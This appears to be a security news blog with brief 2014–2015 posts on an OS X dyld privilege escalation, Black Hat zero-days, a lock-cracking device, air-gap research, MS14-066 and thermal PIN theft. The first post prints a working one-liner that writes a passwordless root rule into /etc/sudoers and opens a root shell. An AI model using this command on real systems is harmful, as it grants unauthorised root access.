Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,

Jul 15 21

…a very interesting article published in wired magazine about wireless carjacking.

written by d45id \\ tags: , , , ,

Jul 15 18

At Black Hat USA security conference 2015 will be presented more than 30 Zero-Day flaws.

„We have 32 different zero-day vulnerabilities that will be disclosed at the event,“ Wylie said. „The zero-days come from a broad swath of topics, including mobile and SCADA [supervisory control and data acquisition] systems.“

I am very curious already.

written by d45id \\ tags: , , ,

Mai 15 14

Combo Breaker is a motorized, battery powered, 3D printed, Arduino-based combination lock cracking device.

Source code / 3D models:https://github.com/samyk/combobreaker


written by d45id \\ tags: , , , , ,

Apr 15 21

It’s amazing how easily modern network systems can be breached, making exhaustive vulnerability management programs more critical than ever. Please join us for a demonstration of how easy it is for attackers to compromise your network during a webinar with Marcus Murray, Cyber Security Manager at TrueSec.

In this awareness session, Marcus Murray will demonstrate a live hack where he uses a specially crafted JPEG picture to circumvent the security mechanisms of a modern Microsoft Windows server 2012R2 Webserver. He will also use this foothold to expand influence over the entire network and compromise a Windows Server 2012 R2 Domain Controller.

During the presentation, Marcus will also discuss countermeasures you can take to increase security in your environment. This is a must-see session for anyone responsible for vulnerability management.

written by d45id \\ tags: , , , , ,

Mrz 15 23

A research by Mordechai Guri and Prof. Yuval Elovici from the Cyber Security Resarch Center at Ben-Gurion University found a new way for jumping the Air-Gap.

This time they are doing this by using the heat emissions and a computer’s built-in thermal sensors.

See also

written by d45id \\ tags: , , , , ,

Nov 14 18

remote_code_executionSicherheitsforscher der Firma BeyondTrust haben einen sehr interesanten Artikel publiziert in dem sie Möglichkeiten zur Nutzung der Sicherheitsanfälligkeit – CVE-2014-6321 / MS14-066 – im Microsoft SChannel-Sicherheitspaket (Secure Channel) im Detail aufzeigen, so zum Beispiele eine remote code execution eines Programms, dass den SChannel Security Service Provider verwendet, wie die Microsoft Internet Information Services (IIS).

Weiterführende Informationen
BeyondTrust – Triggering MS14-066

written by d45id \\ tags: , , , , ,

Sep 14 02

FLIR ONE (TM) is an thermal imaging device extension for your iPhone 5/5s. You can do with that a lot of helpfull an cool thinks but bad guys can use it for examle to steal your pin.

Find out more

written by d45id \\ tags: , , , ,